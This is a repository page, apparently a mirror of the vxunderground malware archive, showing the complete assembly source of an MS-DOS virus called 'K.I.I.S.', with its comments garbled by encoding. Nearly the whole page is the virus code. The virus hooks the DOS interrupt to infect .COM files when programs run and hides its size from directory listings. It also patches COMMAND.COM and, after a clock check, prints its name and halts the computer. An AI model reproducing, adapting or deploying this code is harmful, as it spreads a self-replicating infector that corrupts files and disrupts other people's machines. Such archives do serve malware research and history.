ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
9e9a014bb0
MalwareSourceCode/MSDOS/K-Index/Virus.MSDOS.Unknown.kiis.asm
vxunderground 4b9382ddbc re-organize 
push
2022-08-21 04:07:57 -05:00

269 lines
6.7 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;************************************************************************;
;* T®§¨ Virus ¥ ­ ¯° ¢¥­ ­  25.10.1991 £. ¢ *;
;* *;
;* ‘“ " ‘¢. Š«¨¬¥­² Žµ°¨¤±ª¨ " ¢ 17:18.30 hour *;
;* *;
;* ±² ¿ 316 ­  ”.Œ.ˆ. *;
;************************************************************************;
start: jmp short begin
db (00h)
db (53h) ; ‡  ° §¯®§­ ¢ ­¥ ­  ¢¨°³± 
db (4bh) ; „ «¨ ´ ©«  ¥ § ° §¥­
int 20h
okey: db (0b8h)
db (03h)
db (00h)
db (0cdh)
db (10h)
begin: push cx ;
CALL F1 ;
F1: POP SI ; ‡  ¢º§±² ­®¢¿¢ ­¥ ­  ¯º°¢¨²¥ 5 ¡ ©² 
SUB SI,09 ;
PUSH SI ;
cld ;
mov di,100h ;
mov cx,5 ;
rep movsb ;
jmp ding2
new21: pushf ; CALL ªº¬ ®°¨£¨­ «­®²® INT 21h ­ 
push cs ; IBMDOS.COM - ± ¶¥« ¤  ­¥ ²¥ µ¢ -
call Word ptr cs:[8c0h] ; ­ ² ­¿ª®© ¯°®£° ¬¨ §  ¢¨°³±¨
ret ; ª ²® Anti4us.exe, NDD ¨ ².­.
int21h: STI
cmp ah,4bh ; <20>°¨ ±² °²¨° ­¥ ­  ´ ©«
jz mm ;
cmp ah,11h ; <20>°¨ ²º°±¥­¥ ­  ¯º°¢¨ ¨ ¢²®°¨ ´ ©«
jz home ; ± ¶¥« ¯°¨ DIR ¤  ±ª°¨¢  ¢¨°³± .
cmp ah,12h ;
jz home
jmp int1hh
home: call new21 ; <20>°®¶¥¤³°  ª ²® ¯°¨ DIR ¯°®¢¥°¿¢ 
push ax ; ¤ «¨ · ±  ¥ 10:26 ¨ , ª® ¥ §­ ·¨
push bx ; ´ ©«  ¥ § ° §¥­ ¨ ¨§¢ ¦¤  ¤º«¦¨­ -
push es ; ²  ­  ¢¨°³±  ¤  ­¥ ±¥ § ¡¥«¿§¢ 
; ®£®«¥¬¿¢ ­¥²® ­  ´ ©« .
mov ah,2fh ; ‚§¥¬  DTA ¢ ES:BX . — ±  ¥ ¢ bx+1eh
call new21 ; ’³ª ¥ 10:26 ;
mov ax,534bh
cmp Word ptr es:[bx+1eh],ax
jnz ox
mov ax,End-Okey+3
sub Word ptr es:[bx+24h],ax
ox: pop es ; €ª® ­¥ ¥ 10:26 , ²® §­ ·¨ ­¿¬ ¸
pop bx ; ¢¨°³± ¨ ­¿¬  ¤  ­ ¬ «¨ · ±  ±
pop ax ; ­¥®¡µ®¤¨¬¨²¥ ¡ ©²®¢¥ ¨«¨ ¤º«-
db (0CAh) ; ¦¨­ ²  ­  ¢¨°³±  ¢ ±«³·¥¿.
dw (2)
;****************************************************;
;* ‡   °   § ¿ ¢   ­ ¥ *;
;****************************************************;
mm: pushf
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH DS
PUSH ES
PUSH SI
PUSH DI
xor ax,ax
mov ds,ax
mov di,[0194h]
mov es,[0196h]
mov ax,[004ch]
mov bx,[004eh]
mov cx,0f000h
mov dx,0ec59h
mov [0100h],dx
mov [0102h],cx
mov [0198h],ax
mov [019ah],bx
mov [004ch],di
mov [004eh],es
mov ax,0a15h+new24-begin
push cs
pop ds
push cs
pop es
mov ah,2ch
call new21
cmp cx,0200h
jna mm1
mov ax,0003h
int 10h
mov ah,09h
mov dx,0a15h+n-begin
call new21
cli
hlt
dinge: jmp ding
mm1: mov ah,2fh ;Dos service function ah=2FH (get DTA)
call new21
mov cs:[8b0h],es
mov cs:[8b2h],bx
MOV AH,4eH
MOV DX,0a10h+files-okey
mov cx,0
call new21
jc dinge ;CX File attribute
;DS:DX Pointer of filespec (ASCIIZ string)
vir: mov ax,534bh
cmp es:[bx+16h],ax
jnz fuck
vir1: mov ah,4fh
call new21
jc enzi
jmp short vir
enzi: jmp ding
fuck: mov cx,1500
cmp es:[bx+1ah],cx
jna vir1
fuck1: push es
pop ds
mov ax,3d02h
mov dx,bx
add dx,1eh
call new21
mov cs:[0a10h+handle-okey],ax
mov bx,ax
push cs
pop ds
mov ah,3fh
mov dx,0a10h
mov cx,5
call new21
mov di,0a10h+end-okey
mov al,0e9h
mov [di],al
inc di
mov bx,[8b2h]
mov cx,es:[bx+1ah]
inc cx
inc cx
mov [di],cx
inc di
inc di
mov ax,534bh
mov [di],ax
mov bx,cs:[0a10h+handle-okey]
mov ax,4200h
xor cx,cx
xor dx,dx
call new21
mov ah,40h
mov dx,0a10h+end-okey
mov cx,5
call new21
mov ax,4202h
xor cx,cx
xor dx,dx
call new21
push cs
pop ds
mov bx,cs:[0a10h+handle-okey]
mov ah,40h
mov dx,0a10h
mov cx,end-okey-3
call new21
mov bx,cs:[0a10h+handle-okey]
mov ax,5700h
call new21
mov ax,5701h
mov cx,534bh
call new21
mov ah,3eh
call new21
ding: xor ax,ax
mov ds,ax
mov ax,[0198h]
mov bx,[019ah]
mov [004ch],ax
mov [004eh],bx
POP DI
POP SI
POP ES
POP DS
POP DX
POP CX
POP BX
POP AX
popf
int1hh: jmp word ptr cs:[8c0h] ; <20>°¥ªº±¢ ­¥ 21<32>
files: db '*.com',0 ; ‡ ° §¿¢  ± ¬® COM ´ ©«®¢¥
new24: mov al,03 ; Int 24h ¤  ­¥ ¤ ¢  Write Protect
iret
ding2: MOV AX,0070h ; ‚«¨§  ¢ ±¥£¬¥­ 0070h: ¨ ¯°¥²º°±¢ 
MOV ES,AX ; §  ­¥®¡µ®¤¨¬¨²¥ ¡ ©²®¢¥ ­  INT13H
MOV DI,0000h
MOV AX,80FBh
non1: CLD
MOV CX,0FFFFh
non2: REPNZ SCASW
JZ non
MOV DI,0001h
JMP non1
non: MOV BX,02FCh
CMP ES:[DI],BX
JNZ non2
DEC DI
DEC DI
xor ax,ax ; <20> £« ±¿ ­®¢®²® ¯°¥ªº±¢ ­¥ INT13H ¨
mov ds,ax ; ¨ ±¥ ¯®¤£®²¢¿ §  ° ¡®² 
mov [0194h],di
mov [0196h],es
mov es,[009eh]
mov bx,[00a0h]
push cs
pop ds
MOV BP,DS
pop si
push si ; <20>°¥µ¢º°«¿ ¢¨°³±  ¢ ±²¥ª  ­ 
MOV DI,0a10h ; COMMAND.COM
MOV CX,Handle-Okey ; € ±º¹® ² ª  ¨ ¯®¤£®²¢¿
REP MOVSB ; ¢¨°³±  ¤®¡°¥ ¤  ±¥ ³ª°¥¯¨
PUSH ES ; ¨ ®¯«¥²¥ ± Int 21h
LEA DI,[BX+1bh]
MOV AL,0e9h
STOSB
MOV AX,0A30h
SUB AX,DI
STOSW
MOV AX,9090H
STOSW
STOSW
MOV ES:[8c0h],DI
MOV AX,SS
SUB AX,0018h
CLI
MOV SS,AX
STI
MOV DS,BP
POP ES
pop si
pop cx
xor ax,ax
xor bx,bx
xor dx,dx
xor si,si
mov di,100h
push di
xor di,di
ret
n: db "K.I.I.S.ø ",024h ; ’®§¨ ²¥±² ±¥ ®²¯¥· ²¢  ±«¥¤ 2 · ± .
handle: dw ? ; € ±º¹® ² ª  ¡«®ª¨°  ª®¬¯¾²º° .
end: db (00)

Reference in New Issue View Git Blame Copy Permalink